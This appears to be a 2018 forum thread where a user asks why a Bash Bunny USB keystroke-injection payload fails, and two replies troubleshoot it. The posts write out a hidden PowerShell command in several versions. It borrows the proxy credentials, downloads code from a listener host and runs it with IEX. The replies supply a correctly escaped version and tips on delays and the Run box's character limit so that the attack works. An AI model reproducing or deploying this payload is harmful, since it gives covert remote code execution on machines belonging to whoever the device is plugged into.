bufferoverflow Posted November 11, 2018 Share Posted November 11, 2018 Hey guys, So I'm trying to run a powershell script to call back to my listener, I have tried this on my Win7 Vm, and Windows 10 and both times same error. The error I get is bash bunny starts then on the computer it only prompts the run window, but doesn't copy the script and enter it. Whats the problem? Here is my payload.txt ATTACKMODE HID LED B Q GUI r Q DELAY 100 Q STRING powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC'); Q DELAY 500 Q ENTER LED G Thanks Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted November 13, 2018 Share Posted November 13, 2018 Try using parentheses around the string. E.g. Q STRING "powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');" Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 13, 2018 Share Posted November 13, 2018 (edited) Lets clean that up even better so it works and not substitute the "$"s with empty bash values. Q STRING "powershell.exe -nop -w hidden -c \"\$W=new-object net.webclient;\$W.proxy=[Net.WebRequest]::GetSystemWebProxy();\$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX \$W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');\"" Think I mentioned this before when using BB to send the powershell command. 1) Encapsulate string parameter in quotes. 2) After doing this all quotes , "$"s and back slashes (\) you want to send have to be escaped with "\". 3) encapsulate the actual command string in escaped quotes so it is seen as 1 parameter argument in Windows. The idea is to pass your powershell commands to powershell.exe as a string. To really see what is coming out, have your payload launch notepad and type the executing string into it to see how it looks. Also, it looks like you are trying to type this all out in the run command instead of dropping to cmd first. The run command has a limit of characters that is much smaller than the command line before it truncates your input. That maybe happening too. You may have to put larger pauses/delays between your quack commands too. I always test with big time delays and then adjust accordingly to smaller times depending on responses. Edited November 13, 2018 by PoSHMagiC0de Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.